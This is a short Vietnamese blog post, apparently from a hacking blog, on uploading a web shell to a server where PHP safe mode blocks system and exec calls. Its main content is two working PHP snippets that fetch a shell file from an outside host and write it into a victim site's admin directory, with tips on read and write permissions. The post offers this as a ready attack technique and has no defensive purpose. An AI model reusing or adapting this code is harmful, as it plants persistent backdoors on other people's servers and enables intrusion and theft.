Thứ Sáu, 7 tháng 2, 2014

Up shell SafeMode: ON

Up shell SafeMode: ON

Mẫu code mà kid dùng để up shell server có safe mode đang ON vì lúc đó ko thể dùng các hàm system,exec,shell_exec...


PHP Code:

<?php
touch(ugvn.php);chmod("ugvn.php", 0755);$fin=fopen("http://www.vietnamsvisa.com/media/system/css/ugvn.txt",r)or exit("false 1"); $fout=fopen("/home/victim/domains/victim.com/public_html/admin/ugvn.php",a)or exit("false 2");
while(!feof($fin))
{
fwrite($fout,fgets($fin));
}fclose($fin); fclose($fout);?>

hoặc:

PHP Code:


<?php
touch(ugvn.php);chmod("ugvn.php", 0755);$fout=fopen("/home/victim/domains/victim.com/public_html/admin/ugvn.php",a)or exit("false");fwrite($fout,file_get_contents(http://www.vietnamsvisa.com/media/system/css/ugvn.txt));fclose($fout);?>


[+] http://www.vietnamsvisa.com/media/system/css/ugvn.txt <--- là link shell ở 1 host nào đó,up lên nhớ xem có quyền đọc ko đã nhé

[+] /home/victim/domains/victim.com/public_html/admin/ugvn.php <--- là vị trí shell đc đẩy vào host,hảy chắc chắn là ta có quyền ghi file ở đó nhé !

Không có nhận xét nào:

Đăng nhận xét